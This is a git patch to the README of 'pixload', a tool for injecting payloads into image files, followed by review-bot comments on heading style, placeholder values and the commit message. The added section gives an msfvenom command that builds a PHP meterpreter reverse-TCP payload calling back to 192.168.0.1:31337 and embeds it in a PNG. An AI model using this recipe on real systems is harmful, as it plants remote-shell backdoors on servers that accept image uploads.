From 3035bab65610097862d72c30eba7e3653257a06c Mon Sep 17 00:00:00 2001 From: Alexandr Savca Date: Wed, 29 Jul 2020 21:02:44 +0300 Subject: [PATCH] README.md: mention about msfvenom --- README.md | 13 +++++++++++++ btc-qrcode.png | Bin 1523 -> 0 bytes 2 files changed, 13 insertions(+) delete mode 100644 btc-qrcode.png diff --git a/README.md b/README.md index 5be178a..55c8c32 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,8 @@ Set of tools for ~~hiding backdoors~~ creating/injecting payload into images. The following image types are currently supported: BMP, GIF, JPG, PNG, WebP. +#### about + Useful references for better understanding of `pixload` and its use-cases: - [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs) @@ -23,6 +25,17 @@ both valid x86 shellcode and a valid image file, I recommend you to look [here](https://warroom.securestate.com/bmp-x86-polyglot/) and [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb). +#### msfvenom + +If you want to inject a metasploit payload, try something like this: + +```bash +msfvenom -p php/meterpreter_reverse_tcp \ + LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php +# Edit payload.php if need. +./pixload/png.pl -payload "$(cat payload.php)" -output payload.png +``` + ## SETUP The following Perl modules are required: 
diff --git a/btc-qrcode.png b/btc-qrcode.png deleted file mode 100644 index 4ee2f163c44df1bda48f1ebc1ea2f14b592cc847..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1523 zcma)6e@qi+7%mgF{=jPX#{?G2AeqUW!^rASdL5JTBTHb@0YXR7xk)HPH?fuicjug; zGZ|_$lPnuOqYjixyGaCXX^Y!}xCBqcQcAg=BnaEl-eI7<((CnB|7eeYmh6)6zDvIM zd+&Lk_j%v59~I^$tWH`j5C{?q@^kh@_E2Qq6RwE7*8=U6lB{x7f>W9y z+t$cA)oZ6MnTeB8%y@e_7Q4UXbGRp)jQ4ni6=Y8v*LYoI~KY- z9akw`2j!l6y2c%i@3sF+Hk((&AFIsbPyo zm0)eKI5l(FZ0gg6s*SN?)iRUEH-a#|dyR5Qgd{YgY#FoIOr~~t zTq>%->Wro%z2flN7}o2xvd}H!j=$SMk(+U_$L+z35NrpNwZvP7AGMWiXulc{bdWP$ zB!gpW-5%aFE@glO2>tv3R`pP-LNahn3+IT;OClZwpUAo%y-F#PA*P%r)Tw$KtU{Ws z12MMF(bjNvPkR=&*Si4Cxf=RabjB6FGRME%0{Z%b`&BJtpv`{AYeqZetX1RB z>McR*DvPlyNR`q+FM6;U;elj$6VJ4(xl&58)#~$R0$8w1IAYI*mmjn7PeW2ZPixtS zw(@UJQfedQCe*KYpX8Wdc_5J{fCj)K?lk~!54@+@2*}u*jkT~3dO_;oz7;XGrp6ZM%*FJXJr+N6qNS28?C%Su@ZjYM zu<1=##bHv>2$;9Se&`yC?q<1VVqVCaM_L)kjm)$f-Q2>w3PzG**Z;?aTsk_Z#KJ(R VFb&T5Ix@ut1s@dV7~Vg4`d?G>`{@7x
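Review bot: In the first README.md hunk (`@@ -6,6 +6,8 @@`), the new `#### about` heading is level 4 and lowercase, while the neighbouring section visible in this same patch is `## SETUP` (level 2, uppercase). The second hunk's `#### msfvenom` has the same mismatch. Either match the existing heading convention or make it clear which parent section these subsections belong to, so the rendered outline stays consistent.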
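Review bot: In the `#### msfvenom` hunk (`@@ -23,6 +25,17 @@`), the example hard-codes `LHOST=192.168.0.1 LPORT=31337` without saying these are placeholder values the reader must replace. A short sentence above the code block stating that would avoid copy-paste confusion. Two wording fixes in the same hunk: the shell comment `# Edit payload.php if need.` should read "if needed", and "metasploit" in the introductory sentence should be capitalised as "Metasploit".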
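Review bot: The deletion of `btc-qrcode.png` is not mentioned in the commit subject ("README.md: mention about msfvenom"), although the diffstat lists it as a deleted 1523-byte binary. Either move the deletion to its own commit or name it in the message so the history explains why the file went away. The README hunks shown here do not touch any image reference, so please also confirm that nothing in README.md still links to `btc-qrcode.png` after this change.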